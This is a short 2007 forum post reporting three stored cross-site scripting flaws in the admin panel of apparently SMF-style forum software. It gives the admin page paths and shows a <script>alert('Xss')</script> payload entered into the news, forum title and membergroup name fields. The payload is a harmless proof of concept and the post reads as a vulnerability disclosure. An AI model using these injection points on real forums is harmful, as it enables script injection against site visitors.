zbeng Posted December 20, 2007 Report Posted December 20, 2007 Found Xss in the administration...1----------------------Go to [url]http://link/[/url][path]/index.php?action=newsModify the news and insert<script>alert('Xss')</script>Save the news! no an alert will be generated in every page!2---------------------Go to [url]http://link/[/url][path]/index.php?action=manageboardsCreate a new forum with Title:<script>alert('Xss')</script>result? XSS 3---------------------Go here [url]http://link/[/url][path]/index.php?action=membergroups;Modify or create a new gruop and name it:<script>alert('Xss')</script>---------------------- Quote